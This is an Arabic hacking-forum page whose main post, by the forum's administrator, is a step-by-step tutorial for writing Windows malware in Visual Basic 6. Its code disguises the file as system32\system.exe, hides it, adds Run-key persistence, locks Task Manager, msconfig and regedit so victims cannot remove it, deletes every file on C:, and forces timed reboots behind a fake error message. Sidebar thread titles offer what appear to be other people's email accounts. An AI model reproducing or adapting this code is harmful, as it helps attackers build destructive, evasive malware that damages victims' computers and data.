منتديات سكيورتي تكريت

منتديات سكيورتي تكريت

منتديات سكيورتي تكريت

المواضيع الأخيرة

» ايميل حاتة توب تطب لايت سي
الخميس نوفمبر 08, 2012 2:24 pm من طرف يزن التكريتي

» اميل مرام البرشلونيه المحمي بشبكه احباب العراق
الجمعة يوليو 20, 2012 12:03 am من طرف أبو جارح

» تعال كلي ليش دة سوي هيج ؟ وعلى اختك المسلمة ؟
الأحد مايو 01, 2011 5:35 am من طرف عاشق المطر

» ساعدوني ارجوكم
الثلاثاء مارس 15, 2011 8:45 pm من طرف حواء المغرب

» لمادا رحلت
الإثنين مارس 14, 2011 10:13 pm من طرف حواء المغرب

» ضع قصيده اذهلتني على الاخوت والاصدقاء
الإثنين مارس 14, 2011 10:11 pm من طرف حواء المغرب

» تحميل مسلسل وادي الذئاب الجزء 5 الحلقة 4 مترجمة
السبت أكتوبر 09, 2010 6:14 am من طرف سكيورتي تكريت.

» اميل بنت صغيرة عمرها 18 من الكرادة
الخميس سبتمبر 02, 2010 4:29 am من طرف طه ياسين محمد

» اميل بنت الرافدين
الأربعاء سبتمبر 01, 2010 5:39 am من طرف عشوق

احصائيات

أعضاؤنا قدموا 178 مساهمة في هذا المنتدى في 144 موضوع

هذا المنتدى يتوفر على 904 عُضو.

آخر عُضو مُسجل هو ahmedghost فمرحباً به.

سبتمبر 2017

الإثنينالثلاثاءالأربعاءالخميسالجمعةالسبتالأحد
    123
45678910
11121314151617
18192021222324
252627282930 

اليومية اليومية


    صناعة الفيروسات

    شاطر
    avatar
    سكيورتي تكريت
    مدير عام المنتدى
    مدير عام المنتدى

    عدد المساهمات : 131
    تاريخ التسجيل : 28/03/2010
    العمر : 29
    الموقع : skeuritytakret_net

    صناعة الفيروسات

    مُساهمة  سكيورتي تكريت في السبت أبريل 10, 2010 11:21 am

    الادوات المطلوبة :

    1- فيجول بيسك 6

    2- الذكاء والحيل البرمجيه

    3- الريجتسري ( يجب ان تعرف كيف تتعامل معه )


    ــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ

    اولا:الفايروس يعتمد على المراوغه والاختفاء عند تشغيله

    وهناك شفرات تقوم بهذه المهمه مثلا

    انت تريد عندما يضغط الضحيه على الفايرس تريد ان يختفي وينتقل الي ملف انت تحدده بالشفره البرمجيه

    اذا هذا هو الكود


    كود PHP:
    كود:Name App.Path & "\" & App.EXEName & ".exe" As "c:windowssystem32sysstem.exe




    ماذا فهمت من الكود

    طبعا نحن استخدمناapp.pathوهذه داله تقوم بتحديد مكانالبرنامج (الفايروس) بدون كتابة مساره

    يعني لو فرضا كتبنا دالهnameبهذه الطريقهname c":\virus.exe" as"c:\windows\system32\system.exe"

    كدا خطأ لان احتمال الضحيه شغل الفايروس على سطح المكتب او شغله في ملف الوينزوب كدا مش هيشتغل الفايروس

    لان نحن كتبنا بالشفره انقل الملف من c:\virus.exe الي c:\windows\system32\system.exe

    ولذلك استخدمنا دالهapp.pathتحديد مكان الملف تلقائي بدون كتابة مساره

    يعني بهذه الطريقه هيشتغل الفايروس باي مكان في الجهاز وهذا هو المطلوب


    داله nameهي داله تقوم على نقل الملف الي اي مكان انت تحدده

    نحن قمنا بنقل الملف عند الضغط عليه الي دليل الويندوز ثم الي system32وتغيير اسمه اليsystem

    حتى عندما يراه الضحيه يحسبه ملف تابع للنظام
    ــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ


    طيب حن الان انتهنا من اول خاصيه للفايروس وهي خاصية التنقل


    الان نريد ان نحمي ملف الفايروس من الظهور يعني نريده متخفى غير مرئي

    نستخدم دالهsetattrوهذه الداله تقوم بتغيير في خصائص الملف

    vbshowتعني اظهر الملف

    vbHiddenتجعل الملف مخفي

    بالعربي انا اعتبر هذه الخصائص اهم شىء ويوجد هناك خصائص اخرى لكن ماتهمنا

    طيب كيف نكتب الداله ونستعمل الخصائص

    بعد ماكتبنا الكود الاول وهو كود انتقال الفايروس الي مجلدsystem32

    نكتب كود الاختفاء تحته بالضبط

    setattr "c:\windows\system32\system.exe",vbHidden

    لو شرحنا الكودان يكونا على النحو التالي

    قم بنقل الملفvirus.exeمن مكان وجوده الي مجلد system32وغيراسمه اليsystem.exe

    الكود الثاني قم باخفاء الملف اللى موجود في مجلدsystem32واللي اسمهsystem.exe


    طبعا الان نحن جعلنا الفايروس يتمتع بخصائص الانتقال والتخفى

    على فكره اي ملف يستخدم كود الاختفاء لن يستطيع البحث اللي في جهازك كشفه او اظهاره

    لن الويندوز يعطي حرية الملف باالاختفاء وبذلك يعطل خاصية البحث عنه
    ـــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ

    الان ناتي الي مهمه الفايروس ماذا نريد ان يعمل الفايروس

    هناك عدة امور تخبر بها الفايروس ليقوم بها

    1-اعادة تشغيل الجهاز

    2-حذف ملفات معينه

    3-عمل فورمات للجهاز

    4-ايقاف عمل بعض البرامج التي تحمل امتداد exe اوcom او htm او html او gif وهكذا

    5- الهجوم على ملفات وتخريبها ( اي تغيير امتدادها حتى لاتعمل ) مثل الهجوم على الصور بامتداد gif وتحويلها الي
    امتداد txt او اي امتداد اخر

    5- عمل فقط رساله تظهر قبل شاشة الترحيب

    6- عمل فايروس يقوم باستخدام الدوس وتشغيل بعض اوامره مثل امر ping لضرب المواقع

    7- استخدام الفايروس بتنزيل ملفات تجسس من الانترنت او استدعاء باتش لك من موقعك الخاص وتشغيله في جهاز الضحيه

    8- التحكم في بعض برامج النظام وايقافها مثل ايقاف قائمة المهام وغيرها من البرامج المهمه

    9- اخفاء محركات الاقراص السي الدي المرن الفلاش مموري

    10 - عمل اشياء ازعاجيه مثل فتح مجلدات فتح برامج وهكذا

    11- عمل تسجيل خروج من الماسينجر او التلاعب في حالات الاتصال

    12- عمل رقم سري للجهاز لمنع الضحيه لدخول لسطح المكتب

    13- ارسال الفايروس رساله لنا على بريدنا يخبرنا بتشغيل الضحيه للفايروس مع عرض الاي بي ووقت تشغيله وتاريخه.............

    ــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ
    ـــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ،




    سوف ابدا الان بعمل شفرات توقف اي برنامج تابع لنظام بايقاف الفايروس

    وخلونا نبدأ الان بايقاف قائمة المهام و لن تعمل اذا ضغطت على مفاتيح ctrl+atl+del

    اذا دعونا نصنع كود يخلي النظام يظهر رساله بان قائمة المهام مشغوله مع برنامج اخر وبهذا منعنا المستخدم من فتحها



    كود:
    كود PHP:
    Open "C:\WINDOWS\system32\taskmgr.exe" For Input Lock Read As 1



    الان نحن منعنا المستخدم من فتح قائمة المهام واذا حاول فتحها سوف تظهر رسالة من النظام تقول هذا البرنامج مستخدم من قبل برنامج اخر

    طبعا الكود هذا سوف تضعه فيform_load

    مع وضع كود يقوم على تشغيل الفايروس في كل مره شغل الضحيه جهازه

    وهذا كود تشغيل الفايروس مع تشغيل الجهاز


    كود:



    كود PHP:
    Set O = CreateObject("WScript.Shell")O.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\ProgramName", "c:\WINDOWS\system32\system.exe", "REG_SZ"



    اذا دعونا الان نجمع الاكواد اللي عملناه ونضعها فيform_load

    كود:
    كود PHP:
    Private Sub Form_Load()Set O = CreateObject("WScript.Shell")O.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\ProgramName", "c:\WINDOWS\system32\system.exe", "REG_SZ"Form1.HideName App.Path & "\" & App.EXEName & ".exe" As "c:WINDOWSsystem32system.exe"SetAttr "c:WINDOWSsystem32system.exe", vbHiddenOpen "C:WINDOWSsystem32taskmgr.exe" For Input Lock Read As 1End Sub



    دعونا نشرح عمل الاكواد بالتفصيل

    Set O = CreateObject("WScript.Shell")
    O.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \Cur r entVersion\Run\ProgramName", "c:\WINDOWS\system32\system.exe", "REG_SZ"

    ProgramName = اسم القيمه تستطيع تغيير اسمها مثلا اجعلهاsystemاو اي اسم

    c:\WINDOWS\system32\system.exe"بيانات القيمه

    الكود يقوم على تشغيل الملف اللي اسمه system.exeالذي على المسار التالي
    "c:\WINDOWS\system32\system.exe"

    طبعا هذا الكود يقوم على انشاء قيمه في مفتاحrunاللي في الريجتسري مما يجعل الفايروس يشتغل مع تشغيل الجهاز

    الكود الثانيForm1.Hideعارفينه اكيد يقوم على اخفاء الفايروس فلايظهر نافذته

    الكود الثالث
    Name App.Path & "\" & App.EXEName & ".exe" As "c:\WINDOWS\system32\system.exe"

    يقوم بنقل الفايروس الي مجلدsystem32ويخلي اسمهsystem.exe

    لازم يتوافق مسار الفايروس مع مساره في بدأ التشغيل حتى يستطيع تشغيل نفسه مع تشغيل الجهاز

    الكود الرابع
    setattr "c:\windows\system32\system.exe",vbHiddenاعطاء خاصية الاخفاء للفايروس

    الكود الخامس

    Open "C:\WINDOWS\system32\taskmgr.exe" For Input Lock Read As 1

    معناه يقوم على فتح قائمة المهام للقراءه ولايقوم على غلقها يعني تظل مفتوحه ومعلقه ومرتبطه مع الفايروس

    بحيث لو قام الضحيه بالضغط على مفاتيح ctrl+alt+delمش هتفتح معه

    ولو ذهب الي مجلدsystem32وقام بالضغط عليه سوف تظهر له رساله من النظام بتقول البرنامج مستخدم من قبل برنامج اخر اي ان الفايرس مستخدمها مدام الجهاز شغال ......

    لايقاف قائمة المهام وايقاف برامج اخرى مثل الاداة المساعده التي تقوم على اظهار

    الملفات التي تعمل مع بدء تشغيل الجهاز
    كود PHP:
    <div align="center"><font face="Arial"><font size="5"><font color="lemonchiffon">لاخفاء الفورم يوجد عدة طرق اضيف:</font></font></font>
    <font size="5"><font face="Arial"><font color="lemonchiffon">me.hide</font></font></font>
    <font face="Arial"><font size="5"><font color="lemonchiffon">الفيروس عند بدا التشغيل:</font></font></font>

    <font face="Arial"><font size="5"><font color="lemonchiffon">كود:</font></font></font>
    </div>[center]كود بدا التشغيل:في الموديل:Option ExplicitPrivate Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As LongPrivate Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As LongPrivate Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As LongPrivate Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As LongPrivate Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As LongPrivate Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long, ByVal samDesired As Long, lpSecurityAttributes As Any, phkResult As Long, lpdwDisposition As Long) As LongPrivate Const READ_CONTROL = &H20000Private Const KEY_QUERY_VALUE = &H1Private Const KEY_SET_VALUE = &H2Private Const KEY_CREATE_SUB_KEY = &H4Private Const KEY_ENUMERATE_SUB_KEYS = &H8Private Const KEY_NOTIFY = &H10Private Const KEY_CREATE_LINK = &H20Private Const KEY_READ = KEY_QUERY_VALUE + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + READ_CONTROLPrivate Const KEY_WRITE = KEY_SET_VALUE + KEY_CREATE_SUB_KEY + READ_CONTROLPrivate Const KEY_EXECUTE = KEY_READPrivate Const KEY_ALL_ACCESS = KEY_QUERY_VALUE + KEY_SET_VALUE + KEY_CREATE_SUB_KEY + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + KEY_CREATE_LINK + READ_CONTROLPrivate Const RunPath = "Software\Microsoft\Windows\CurrentVersion\Run\"Pr ivate Const HKLM = &H80000002' استخدم الامر التالي لالغاء التشغيل التلقائيPublic Sub DoNotRun(ProgramName As String) Dim hKey As Long Dim Ret As Long ' فتح المفتاح المطلوب Ret = RegOpenKeyEx(HKLM, RunPath, 0, KEY_ALL_ACCESS, hKey) ' حذفها من مسجل النظام. Ret = RegDeleteValue(hKey, ProgramName) ' إغلاق المفتاح RegCloseKey hKeyEnd SubPublic Sub RunWhenStartup(ProgramName As String, ProgramPath As String) Dim hKey As Long Dim Ret As Long ' فتح المفتاح المطلوب Ret = RegOpenKeyEx(HKLM, RunPath, 0, KEY_ALL_ACCESS, hKey) ' إنشاء قيمة جديدة بإسم البرنامج وعنوانه. Ret = RegSetValueEx(hKey, ProgramName, 0&, 1, ProgramPath, Len(ProgramPath)) 'LenB(StrConv(TheData, vbFromUnicode)) + 1) ' إغلاق المفتاح RegCloseKey hKeyEnd Sub------------في الفورم :RunWhenStartup "عنوان", App.Path & "" & App.EXEName & ".exe"




    و اما عن التدمير :


    كود:
    كود PHP:
    kill "c:\*.*"




    و لضمان عمل الفيروس :
    كود PHP:
    On Error Resume Next




    الي الان احنا حمينا الفايروس من قائمة المهام وبهذا حققنا الحمايه رقم واحد

    الان نريد حماية الفايروس من اداة بدء التشغيل التي تعرض البرامج التي تعمل مع بداية الويندوز

    نعمل لها كود نفس كود قائمة المهام

    منع قراءة او فتح برنامج الاداة المساعده ( بدأ التشغيل )

    كود:
    كود PHP:
    Open "C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe " For Input Lock Read As 1



    وبهذا حققنا الحماية رقم اثنين


    منع قراءة برنامج الريجستري

    كود:
    كود PHP:
    Open "C:\WINDOWS\regedit.exe" For Input Lock Read As 1



    وبهذه ايضا حققنا الحماية الثالثه للفايروس


    يشوف اي شخص فاهم للجهاز وطريقة حذف الملفات يتبع عدة طرق

    1-قائمة المهام لايقافه
    2-بدء الشتغيل لايقاف عمله حتى لايعمل مع بدء التشغيل
    3-حذفه من الريجستري يعني حذف القيمه بتاعته

    احنا نريد ايقاف عمل الثلاث برامج هذه حتى يبقى الفايروس بأمان

    وطبعا الان نحن حقننا ثلاث حمايات للفايروس من برنامج قائمة المهام وبرنامج الاداة المساعده(بدء التشغيل) ومن الريجستري

    دلوقتى اتحدى اي شخص يحذف الفايرس

    الان ناتي الي اعمال الفايروس نريد نتفنن في اعماله واوامره
    يعني بدال من خلي الفايروس يعيد التشغيل كل مافتح الجهاز نخليه يعيد التشغيل في ساعه ودقيقه معينه

    يعني مثلا يعيد تشغيل الجهاز كل ما تكون الساعه1:1و2:1و3:1وهكذا

    يعني كل ساعه ودقيقه ينشط الفايرس وكل ساعتين ودقيقه ينشط الفايرس وهكذا

    طيب الان افتح موديل في الفيجول بيسك وضع فيها هذا الكود

    كود:
    كود PHP:
    Declare Function ExitWindow*** Lib "user32" _(ByVal uFlags As Long, ByVal dwReserved _As Long) As Long



    وبعدها ضع عداد تايمر على الفورم وجعله1000العداد

    الان اكتب الشفره البرمجيه الرائعه

    كود:
    كود PHP:
    Private Sub Timer1_Timer()If Minute(Time) = 1 Thent& = ExitWindow***(EWX_REBOOT, 0)End IfEnd Sub



    هذا الكود يقوم على تسجيل خروج من الجهاز يعني لازم تكون الساعه1:1يعني لازم الساعه تكون ساعه ودقيقه

    ساعتين ودقيقه ثلاث ساعات ودقيقه وهكذا

    طبعا قبل تسجيل الخروج بدقيقه تظهر رساله او نافذه تخبر الضحيه بان هناك خلل في ملف معين ولذلك يجب تسجيل الخروج

    كود:
    كود PHP:
    Private Sub Timer2_Timer()If Minute(Time) = 0 ThenMsgBox "ملفات الربط لاتستجيب للنظام سوف يقوم النظام بتسجيل الخروج"End IfEnd Sub



    لاحظ جعلنا الدقائق تساوي صفر يعني الرسالة سوف تظهر كل ما تكون الساعه3:00و2:00وهكذا


    يعني قبل تسجيل الخروج بدقيقه تظهر الرساله تخبر الضحيه بوجود خلل .............


    ـــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ

      الوقت/التاريخ الآن هو الجمعة سبتمبر 22, 2017 2:33 pm